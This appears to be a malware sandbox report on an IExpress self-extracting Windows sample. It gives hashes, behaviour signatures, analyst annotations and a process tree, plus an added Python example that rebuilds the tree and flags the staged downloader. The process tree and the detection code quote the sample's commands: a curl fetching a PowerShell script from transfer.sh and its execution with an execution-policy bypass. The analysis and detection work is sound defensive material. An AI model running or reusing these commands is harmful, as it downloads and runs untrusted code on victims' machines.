Analysis
max time kernel: 44s
max time network: 33s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 17/01/2023, 08:11
Static task: static1
Behavioral task: behavioral1
  Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
  Resource: win10v2004-20221111-en
General
Target: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Size: 547KB
MD5: b0ab211e83a23d58e1322e4d2d6f0a96
SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures
Adds Run key to start application (2 TTPs, 2 IoCs)
Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce, by {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"", by {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Note: a RunOnce value named wextract_cleanup0 that calls advpack.dll,DelNodeRunDLL32 on an IXP000.TMP directory is the standard cleanup entry written by the Windows IExpress/wextract self-extracting stub; it deletes the extraction directory at next logon and runs nothing else. Together with the IXP000.TMP path in the process tree it identifies the sample as an IExpress SFX package, not as deliberate persistence. Any real persistence would have to come from the downloaded rr.ps1, whose contents are not captured in this report.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but the signature is a generic heuristic: nothing else in this report shows mass file modification or encryption, and the observed process tree is a staged downloader.

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid 620, process powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Token: SeDebugPrivilege, pid 620, process powershell.exe

Suspicious use of WriteProcessMemory (21 IoCs)
Seven distinct parent-to-child writes, each logged three times (7 x 3 = 21). Every pair below is a parent spawning its direct child in the process tree; no write targets an unrelated process, so there is no indication of injection into a foreign process.
description                        pid   process                                       procid_target
PID 2024 wrote to memory of 1788   2024  {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe    28
PID 1788 wrote to memory of 668    1788  cmd.exe                                       30
PID 668 wrote to memory of 1384    668   WScript.exe                                   31
PID 1384 wrote to memory of 540    1384  cmd.exe                                       33
PID 668 wrote to memory of 1128    668   WScript.exe                                   34
PID 1128 wrote to memory of 1604   1128  cmd.exe                                       36
PID 1604 wrote to memory of 620    1604  cmd.exe                                       37
Processes
Process tree (indentation = depth; each entry gives the image path with PID, then the command line, then the signatures raised by that process):

C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe (PID 2024)
  "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (PID 1788)
    cmd /c new.vbs
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WScript.exe (PID 668)
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe (PID 1384)
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe (PID 540)
          cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      C:\Windows\System32\cmd.exe (PID 1128)
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\cmd.exe (PID 1604)
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          - Suspicious use of WriteProcessMemory
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 620)
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
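Rebuilding this chain from flat parent/child telemetry and flagging it is what a detection engineer would do with the tree above, so here is an added example in Python (it is not code from the sandbox or from this page). It reconstructs the tree from constructed Sysmon-style process-creation events whose PIDs and command lines are copied from the report, applies three command-line rules that together describe the staged downloader (a script host launched from an IExpress IXP000.TMP directory, curl saving a .ps1 to disk, PowerShell run with an execution-policy bypass against a script under AppData\Roaming), and correlates them under a common script-host ancestor. Assumptions: the event field names, the parent of PID 2024 (not recorded in the report, so set to None), and the regexes, which are this example's own. Note that -exec and -C are accepted abbreviations of powershell.exe's -ExecutionPolicy and -Command parameters, so the final command runs rr.ps1 as a command expression regardless of the machine's configured execution policy.

```python
"""Rebuild the report's process tree from flat parent/child events and flag the
staged downloader chain (IExpress SFX -> VBS -> curl -> PowerShell).

Added example, not the sandbox's code. EVENTS is constructed by hand from the
PIDs and command lines in the report; the field names (pid, ppid, image,
cmdline) are an assumed Sysmon-like shape, the root's parent PID is not in the
report (None), and the RULES regexes are this example's own detection logic.
"""
import re
from collections import defaultdict

SFX = r"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
CURL = r"curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"
PS = r"powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"

# Constructed events mirroring the report's process tree, in the report's order.
EVENTS = [
    {"pid": 2024, "ppid": None, "image": SFX, "cmdline": f'"{SFX}"'},
    {"pid": 1788, "ppid": 2024, "image": r"C:\Windows\system32\cmd.exe", "cmdline": "cmd /c new.vbs"},
    {"pid": 668, "ppid": 1788, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"'},
    {"pid": 1384, "ppid": 668, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": rf'"C:\Windows\System32\cmd.exe" /c cmd.exe /c {CURL}'},
    {"pid": 540, "ppid": 1384, "image": r"C:\Windows\system32\cmd.exe", "cmdline": f"cmd.exe /c {CURL}"},
    {"pid": 1128, "ppid": 668, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": rf'"C:\Windows\System32\cmd.exe" /c cmd.exe /c {PS}'},
    {"pid": 1604, "ppid": 1128, "image": r"C:\Windows\system32\cmd.exe", "cmdline": f"cmd.exe /c {PS}"},
    {"pid": 620, "ppid": 1604, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS},
]

# Each rule: name -> (regex over the command line, human-readable description).
RULES = {
    "script_host_from_iexpress_tmp": (
        re.compile(r"[wc]script\.exe.*\\IXP\d{3}\.TMP\\", re.I),
        "WScript/CScript running a script out of an IExpress extraction directory"),
    "curl_drops_ps1": (
        re.compile(r"\bcurl\b.*(?:--output|-o)\s+\S+\.ps1\b", re.I),
        "curl writing a .ps1 to disk"),
    "powershell_bypass_roaming_script": (
        re.compile(r"powershell(?:\.exe)?.*-exec(?:utionpolicy)?\s+bypass\b.*\\AppData\\Roaming\\\S+\.ps1\b", re.I),
        "PowerShell with ExecutionPolicy Bypass running a script from AppData\\Roaming"),
}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def lineage(pid, by_pid):
    """PIDs from the outermost recorded ancestor down to pid (stops on unknown parent or a cycle)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def render_tree(events, root_ppid=None):
    """Indented tree lines in event order, like the report's Processes section."""
    by_ppid = defaultdict(list)
    for e in events:
        by_ppid[e["ppid"]].append(e)
    lines = []

    def walk(ppid, depth):
        for e in by_ppid[ppid]:
            lines.append("  " * depth + f"{basename(e['image'])} (PID {e['pid']})")
            walk(e["pid"], depth + 1)

    walk(root_ppid, 0)
    return lines


def detect(events):
    """Every rule hit as {rule, pid, chain}; the nested 'cmd /c' wrappers match as well."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        for name, (rx, _desc) in RULES.items():
            if rx.search(e["cmdline"]):
                hits.append({"rule": name, "pid": e["pid"],
                             "chain": [basename(by_pid[p]["image"]) for p in lineage(e["pid"], by_pid)]})
    return hits


def staged_chain(events):
    """PID of a flagged script host under which both the curl drop and the PowerShell run occurred, else None."""
    by_pid = {e["pid"]: e for e in events}
    hits = detect(events)
    for host in (h["pid"] for h in hits if h["rule"] == "script_host_from_iexpress_tmp"):
        # lineage()[:-1] is the strict ancestor set of the hit's PID.
        stages = {h["rule"] for h in hits if host in lineage(h["pid"], by_pid)[:-1]}
        if {"curl_drops_ps1", "powershell_bypass_roaming_script"} <= stages:
            return host
    return None


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    for h in detect(EVENTS):
        print(f"{h['rule']}: PID {h['pid']} via {' > '.join(h['chain'])}")
    print("staged downloader chain rooted at script host PID:", staged_chain(EVENTS))
```

Matching on the command line rather than only on the leaf process is deliberate: the same curl and powershell strings surface in the intermediate cmd.exe wrappers (PIDs 1384, 1128, 1604), so the rules fire even on telemetry that records only parents or truncates the deepest child. The correlation in staged_chain ties the drop and the execution to the same WScript.exe ancestor (PID 668), which is a much stronger signal than either rule alone.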
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 300.0MB
MD5: f7e7099eea0cc25fc49d04cd53c573a1
SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074